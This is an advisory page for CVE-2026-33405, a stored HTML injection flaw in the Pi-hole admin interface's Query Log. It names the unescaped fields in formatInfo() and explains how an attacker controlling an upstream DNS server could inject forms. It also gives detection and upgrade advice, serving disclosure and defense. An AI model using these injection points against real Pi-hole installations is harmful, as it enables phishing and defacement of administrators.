CVE-2026-33405
Stored HTML Injection in Pi-hole Admin Interface Query Log
Publication date: 2026-04-06
Last updated on: 2026-04-09
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| pi-hole | web_interface | From 6.0 (inc) to 6.4.1 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-33405 is a stored HTML injection vulnerability in the Pi-hole Admin Interface, specifically in the queries.js file affecting versions 6.0 through 6.4.1. The vulnerability occurs because the formatInfo() function renders certain fieldsβdata.upstream, data.client.ip, and data.ede.textβdirectly into HTML without proper escaping when a user expands a query row in the Query Log detail view.
While JavaScript execution is blocked by the server's Content Security Policy (CSP), the injected HTML can still cause UI defacement or phishing risks by injecting arbitrary HTML forms or content. The vulnerability requires authenticated administrator access and either local filesystem access or control over an upstream DNS server to exploit.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided information does not specify any direct impact of this vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.
How can this vulnerability impact me? :
This vulnerability can impact you by allowing an attacker with authenticated administrator access to cause UI defacement or phishing attacks within the Pi-hole Admin Interface. Although JavaScript execution is blocked by the CSP, malicious HTML can still be injected, potentially misleading administrators through fake forms or altered interface elements.
Exploitation requires either control over an upstream DNS server to inject malicious Extended DNS Error (EDE) text or interception of API responses, making the attack vector local and requiring high privileges.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this vulnerability involves verifying the Pi-hole version and inspecting the behavior of the Query Log detail view in the Pi-hole Admin Interface.
Specifically, check if your Pi-hole version is between 6.0 and before 6.5, as these versions are affected.
Since exploitation requires authenticated administrator access and potentially control over upstream DNS responses, detection can include reviewing query logs for unusual HTML content in the expanded query rows.
No explicit commands are provided in the resources, but general steps include:
- Check Pi-hole version: `pihole -v`
- Manually inspect the Query Log detail view in the Admin Interface for any unexpected HTML rendering or UI defacement.
- Review upstream DNS server responses or logs for suspicious Extended DNS Error (EDE) text that might contain HTML.
What immediate steps should I take to mitigate this vulnerability?
The primary mitigation step is to upgrade Pi-hole to version 6.5 or later, where this vulnerability has been fixed.
Since exploitation requires authenticated administrator access, ensure that access to the Pi-hole Admin Interface is tightly controlled and limited to trusted users.
Additionally, restrict or monitor control over upstream DNS servers to prevent injection of malicious Extended DNS Error (EDE) text.
The server's Content Security Policy (CSP) already mitigates JavaScript execution risks, but it does not prevent UI defacement or phishing via injected HTML forms, so vigilance is necessary.